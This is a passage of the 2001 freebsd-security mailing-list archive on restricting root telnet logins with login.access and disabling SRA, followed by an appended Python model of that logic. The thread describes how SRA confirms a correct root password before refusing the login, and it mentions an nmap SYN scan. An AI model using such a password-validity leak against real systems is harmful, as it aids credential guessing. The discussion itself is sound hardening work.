-=r=- > > On Fri, 11 May 2001, jamie rishaw wrote: > > > If you "Expect", then you best be buying commercial support. > > > > This list is not for one to make demands .. > > > > On Fri, May 11, 2001 at 02:35:58PM +0800, edwin chan wrote: > > > I expect a answer about SRA too. > > > > -- > > jamie rishaw > > sr. wan/unix engineer/ninja // playboy enterprises inc. > > opinions stated are mine, and are not necessarily those of the bunny. > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 9:23:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from peace.mahoroba.org (peace.calm.imasy.or.jp [202.227.26.34]) by hub.freebsd.org (Postfix) with ESMTP id 3CD6A37B424 for ; Fri, 11 May 2001 09:23:36 -0700 (PDT) (envelope-from ume@mahoroba.org) Received: from localhost (IDENT:bFjGTDkSdR5SOvBgb2w9lqyxWa9xY2ZjOjPoZBO6tei/6Apea6XQyS8aHyHJIvq9@localhost [::1]) (authenticated as ume with CRAM-MD5) by peace.mahoroba.org (8.11.3/8.11.3/peace) with ESMTP/inet6 id f4BGN0180211; Sat, 12 May 2001 01:23:00 +0900 (JST) (envelope-from ume@mahoroba.org) Date: Sat, 12 May 2001 01:22:56 +0900 (JST) Message-Id: <20010512.012256.74710954.ume@mahoroba.org> To: mike@sentex.net Cc: ZGabor@CoDe.hu, freebsd-security@freebsd.org Subject: Re: preventing direct root login on telnetd From: Hajimu UMEMOTO In-Reply-To:
<4.2.2.20010511075808.023ee200@192.168.0.12> References: <4.2.2.20010511000303.036916f8@192.168.0.12> <20010511071947.C264@zg.CoDe.hu> <4.2.2.20010511075808.023ee200@192.168.0.12> X-Mailer: xcite1.38> Mew version 1.95b119 on Emacs 20.7 / Mule 4.0 =?iso-2022-jp?B?KBskQjJWMWMbKEIp?= X-PGP-Public-Key: http://www.imasy.org/~ume/publickey.asc X-PGP-Fingerprint: 6B 0C 53 FC 5D D0 37 91 05 D0 B3 EF 36 9B 6A BC X-URL: http://www.imasy.org/~ume/ X-Operating-System: FreeBSD 5.0-CURRENT Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >>>>> On Fri, 11 May 2001 07:59:55 -0400 >>>>> Mike Tancsa said: >Or maybe via the /etc/login.access file. man login.access >Btw. Don't use telnet, and never login as root. Use `su' instead. mike> Yes, I dont ever use it but customers do to this particular machine. I mike> will take a look at login.access. Do you know if it works, or if telnetd mike> now ignores that as well ? It's working for me. 
My login.access has the following entry: -:root:ALL EXCEPT console ttyv0 ttyv1 ttyv2 ttyv3 ttyv4 ttyv5 ttyv6 ttyv7 Or, you can disable SRA authentication by adding the `-X sra' option to telnetd in /etc/inetd.conf -- Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org http://www.imasy.org/~ume/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 9:27:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 4161437B43C for ; Fri, 11 May 2001 09:27:19 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 45398 invoked by uid 1000); 11 May 2001 16:26:41 -0000 Date: Fri, 11 May 2001 19:26:41 +0300 From: Peter Pentchev To: mike@sentex.net Cc: Hajimu UMEMOTO , ZGabor@CoDe.hu, freebsd-security@freebsd.org Subject: Re: preventing direct root login on telnetd Message-ID: <20010511192641.E24224@ringworld.oblivion.bg> Mail-Followup-To: mike@sentex.net, Hajimu UMEMOTO , ZGabor@CoDe.hu, freebsd-security@freebsd.org References: <4.2.2.20010511000303.036916f8@192.168.0.12> <20010511071947.C264@zg.CoDe.hu> <4.2.2.20010511075808.023ee200@192.168.0.12> <20010512.012256.74710954.ume@mahoroba.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010512.012256.74710954.ume@mahoroba.org>; from ume@mahoroba.org on Sat, May 12, 2001 at 01:22:56AM +0900 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, May 12, 2001 at 01:22:56AM +0900, Hajimu UMEMOTO wrote: > >>>>> On Fri, 11 May 2001 07:59:55 -0400 > >>>>> Mike Tancsa said: > > >Or maybe via the /etc/login.access file. man login.access > >Btw. Don't use telnet, and never login as root. Use `su' instead.
> > mike> Yes, I dont ever use it but customers do to this particular machine. I > mike> will take a look at login.access. Do you know if it works, or if telnetd > mike> now ignores that as well ? > > It's working for me. My login.access has following entry: > > -:root:ALL EXCEPT console ttyv0 ttyv1 ttyv2 ttyv3 ttyv4 ttyv5 ttyv6 ttyv7 > > Or, you can disable SRA authentication by adding `-X sra' option to > telnetd in /etc/inet.conf login.conf should work - telnetd invokes login(1). G'luck, Peter -- What would this sentence be like if it weren't self-referential? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 11 10: 3:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 9EE6D37B423 for ; Fri, 11 May 2001 10:03:07 -0700 (PDT) (envelope-from mike@sentex.net) Received: from simoeon.sentex.net (simeon.sentex.ca [209.112.4.47]) by smtp1.sentex.ca (8.11.2/8.11.1) with ESMTP id f4BH2VU93774; Fri, 11 May 2001 13:02:31 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20010511125356.02b7cc30@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Fri, 11 May 2001 12:56:28 -0400 To: Hajimu UMEMOTO From: Mike Tancsa Subject: Re: preventing direct root login on telnetd Cc: freebsd-security@freebsd.org In-Reply-To: <20010512.012256.74710954.ume@mahoroba.org> References: <4.2.2.20010511075808.023ee200@192.168.0.12> <4.2.2.20010511000303.036916f8@192.168.0.12> <20010511071947.C264@zg.CoDe.hu> <4.2.2.20010511075808.023ee200@192.168.0.12> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 01:22 AM 5/12/01 +0900, Hajimu UMEMOTO wrote: >mike> Yes, I dont ever use it but customers do to this particular 
machine. I >mike> will take a look at login.access. Do you know if it works, or if >telnetd >mike> now ignores that as well ? > >It's working for me. My login.access has following entry: > > -:root:ALL EXCEPT console ttyv0 ttyv1 ttyv2 ttyv3 ttyv4 ttyv5 ttyv6 ttyv7 Thanks, it's almost there. The only problem is that if you give it the correct password, [ SRA accepts you ] Permission denied. Connection closed by foreign host. The potential attacker is notified of it being correct before being booted. >Or, you can disable SRA authentication by adding `-X sra' option to >telnetd in /etc/inet.conf Super, this is the best for me for now. ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 12 12:59:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from totem.fix.no (totem.fix.no [213.142.66.130]) by hub.freebsd.org (Postfix) with ESMTP id 856E937B43E for ; Sat, 12 May 2001 12:59:46 -0700 (PDT) (envelope-from anders@totem.fix.no) Received: by totem.fix.no (Postfix, from userid 1000) id 436C73CC8; Sat, 12 May 2001 21:59:35 +0200 (CEST) Date: Sat, 12 May 2001 21:59:35 +0200 From: Anders Nordby To: freebsd-security@freebsd.org Subject: bsd_auth, PAM, etc. Message-ID: <20010512215935.A66047@totem.fix.no> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i X-Operating-System: FreeBSD 4.1.1-STABLE X-PGP-Key: http://anders.fix.no/pgp/ X-PGP-Key-FingerPrint: 1E0F C53C D8DF 6A8F EAAD 19C5 D12A BC9F 0083 5956 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I noticed OpenBSD has something called bsd_auth, an authentication system obtained from BSDI. Is it feasible for FreeBSD to implement this too? PAM works ok for me and is quite easy to implement support for, make new modules etc.
But our implementation seems to be directly dependent on Linuxisms, and we don't know where that route is going to end up. Oh well, I just wanted to notify you of this in case you didn't know about bsd_auth. The man page for it can be looked up at: http://www.openbsd.org/cgi-bin/man.cgi?query=bsd_auth&sektion=3&apropos=0&manpath=OpenBSD+Current Cheers, -- Anders. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 12 22: 6:29 2001 Delivered-To: freebsd-security@freebsd.org Received: from one.net (ip-216-23-48-192.adsl.one.net [216.23.48.192]) by hub.freebsd.org (Postfix) with ESMTP id A33A937B424 for ; Sat, 12 May 2001 22:06:25 -0700 (PDT) (envelope-from cokane@one.net) Received: (from cokane@localhost) by one.net (8.11.3/8.11.3) id f4D5MTv00633; Sun, 13 May 2001 01:22:29 -0400 (EDT) (envelope-from cokane) Date: Sun, 13 May 2001 01:22:29 -0400 From: Coleman Kane To: Dag-Erling Smorgrav Cc: Retal , freebsd-security@FreeBSD.ORG Subject: Re: Some Kernel options, sc is broken Message-ID: <20010513012229.A561@cokane.yi.org> References: <002601ba1df7$4da07940$b88f39d5@a> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from des@ofug.org on Thu, May 10, 2001 at 11:09:06AM +0200 X-Vim: vim:tw=70:ts=4:sw=4 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Well, there is brokenness here. The sc driver no longer reads the flags from the hints correctly. I realized this when my USB keyboard would not attach to the console if it was probed after boot. I have one of the early VIA 586 chips with a broken USB controller on it (Windows uses the 'USB filter patch' to make it more reliable). Basically, sometimes it returns an error on probe and has to be unplugged and plugged back in until it works.
Well, I can't set the flag to allow the sc driver to constantly probe until it finds a kbd, so I have to reboot remotely. I sent mail to the last committer and haven't gotten a reply. I haven't had the time or I would have fixed it myself. Dag-Erling Smorgrav had the audacity to say: > "Retal" writes: > > options KBD_INSTALL_CDEV # install a CDEV entry in /dev > > This option has no (visible) effect unless you use a USB keyboard. > > > options TCP_DROP_SYNFIN #drop TCP packets with SYN+FIN > > This option has no effect unless you set tcp_drop_synfin="YES" in > /etc/rc.conf. > > > options TCP_RESTRICT_RST #restrict emission of TCP RST > > Don't. Use blackhole(4) instead. > > > options ICMP_BANDLIM > > This option has an easily demonstrable effect: try running 'nmap -sS' > against your machine. > > > BTW: if i add TCP_DROP_SYNFIN, it should effect setup option in my > > firewall ?if it is, how ? > > See the rc.conf(5) man page. > > DES > -- > Dag-Erling Smorgrav - des@ofug.org > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
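Editor's added example for the "preventing direct root login on telnetd" thread above (this is not code from the list, from FreeBSD's login(1), or from the login_access() source): a Python model of how a login.access(5) table is evaluated (first matching line wins, '-' denies, '+' permits, no match means access is granted), run against the exact entry Hajimu Umemoto posted, followed by a model of the ordering problem Mike Tancsa reported, where the SRA exchange verifies the password before login(1) consults login.access, so a refused root login still tells the client the password was right, beside a variant that answers uniformly. Only the subset of login.access syntax that entry needs is implemented (user names and ALL; ALL, LOCAL, tty/host names and a ".domain" suffix as origins; EXCEPT on the origins field). The credential table, the user "alice", the passwords and the tty names are constructed test data; "ttyp0" stands for the kind of pseudo-terminal a telnet session is given, "ttyv0" for the first virtual console.

```python
# Added example for the login.access / SRA discussion above; a simplified
# model written for this page, NOT FreeBSD's login_access() implementation.
# The rule below is the entry posted in the thread; everything else
# (users, passwords, ttys) is constructed test data.

# Constructed /etc/login.access contents.  Format: permission:users:origins
# First matching line wins; '-' denies, '+' permits; no match => permit.
LOGIN_ACCESS = """
# root only on the console and the virtual terminals
-:root:ALL EXCEPT console ttyv0 ttyv1 ttyv2 ttyv3 ttyv4 ttyv5 ttyv6 ttyv7
"""

# Constructed credential store standing in for the password database.
PASSWORDS = {"root": "hunter2", "alice": "s3cret"}


def parse_login_access(text):
    """Return [(permit, users, origins, excepted_origins), ...].

    Supports the subset the thread's entry uses: user names and ALL in the
    users field; ALL, LOCAL, tty/host names and a '.domain' suffix in the
    origins field, with an optional 'EXCEPT' list.
    """
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = [f.strip() for f in line.split(":", 2)]
        if len(fields) != 3 or fields[0] not in ("+", "-"):
            raise ValueError("malformed login.access line: %r" % raw)
        perm, users, origins = fields
        allowed, _, excepted = origins.partition(" EXCEPT ")
        rules.append((perm == "+", users.split(), allowed.split(), excepted.split()))
    return rules


def _origin_matches(pattern, origin):
    if pattern == "ALL":
        return True
    if pattern == "LOCAL":            # unqualified names: ttys, local hosts
        return "." not in origin
    if pattern.startswith("."):       # ".example.org" matches a host suffix
        return origin.endswith(pattern)
    return pattern == origin


def login_access_permits(rules, user, origin):
    """Emulate the decision login(1) takes from login.access for one login."""
    for permit, users, allowed, excepted in rules:
        user_hit = "ALL" in users or user in users
        origin_hit = (any(_origin_matches(p, origin) for p in allowed)
                      and not any(_origin_matches(p, origin) for p in excepted))
        if user_hit and origin_hit:
            return permit
    return True                       # no rule matched: access granted


def sra_style_login(rules, user, password, tty):
    """The ordering Mike Tancsa reported: the SRA exchange verifies the
    password first and login(1) consults login.access afterwards, so a
    refused root login still tells the client the password was right."""
    if PASSWORDS.get(user) != password:
        return "login incorrect"
    if not login_access_permits(rules, user, tty):
        return "[ SRA accepts you ] Permission denied"   # validity leaked
    return "shell"


def uniform_login(rules, user, password, tty):
    """Evaluate both checks and give one answer for any failure, so a denied
    origin cannot be used as a password oracle."""
    password_ok = PASSWORDS.get(user) == password
    access_ok = login_access_permits(rules, user, tty)
    if password_ok and access_ok:
        return "shell"
    return "login incorrect"


if __name__ == "__main__":
    rules = parse_login_access(LOGIN_ACCESS)
    for tty in ("ttyp0", "ttyv0"):
        for pw in ("hunter2", "wrong"):
            print("%-5s %-8s sra=%-40s uniform=%s" % (
                tty, pw, sra_style_login(rules, "root", pw, tty),
                uniform_login(rules, "root", pw, tty)))
```

Running it shows root on ttyp0 refused by the rule while root on ttyv0 and an ordinary user anywhere are let through, and that only the uniform variant gives the same reply for a right and a wrong root password on a denied origin. Disabling SRA with `-X sra`, as the thread settles on, removes the early password check that produced the leak in the first place.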